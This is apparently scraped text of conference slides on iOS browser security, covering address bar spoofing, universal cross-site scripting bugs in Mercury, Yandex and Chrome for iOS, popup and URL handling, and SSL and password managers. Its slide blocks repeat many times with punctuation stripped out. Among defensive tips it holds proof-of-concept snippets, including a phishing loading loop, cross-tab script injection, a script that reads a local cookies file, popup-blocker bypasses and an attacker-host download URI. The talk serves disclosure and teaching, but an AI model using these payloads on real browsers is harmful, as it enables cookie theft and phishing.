bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 32: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/32.jpg)
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 33: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/33.jpg)
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 34: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/34.jpg)
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
